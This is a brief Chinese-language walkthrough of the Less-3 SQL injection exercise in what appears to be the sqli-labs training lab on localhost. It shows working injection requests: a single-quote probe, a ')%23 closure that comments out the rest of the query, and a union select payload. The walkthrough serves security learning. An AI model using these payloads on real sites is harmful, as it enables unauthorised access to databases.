实质上和less1没有多大区别,看懂了一样走流程
提交参数
加单引号
http://localhost/sqli/Less-3/?id=1'
观察报错,看near 和 at 的引号之间内容
'1'') LIMIT 0,1
1后面有一个 ' 是我们添加的,于是正常的sql语句应该是
select ... from ... where xx=('1') limit 0,1
于是构造
select ... from ... where xx=('1')#') limit 0,1
对应的GET请求为
http://localhost/sqli/Less-3/?id=1')%23
union查询
http://localhost/sqli/Less-3/?id=a') union select 1,2,3%23
后面的参照less1
贴一下源码
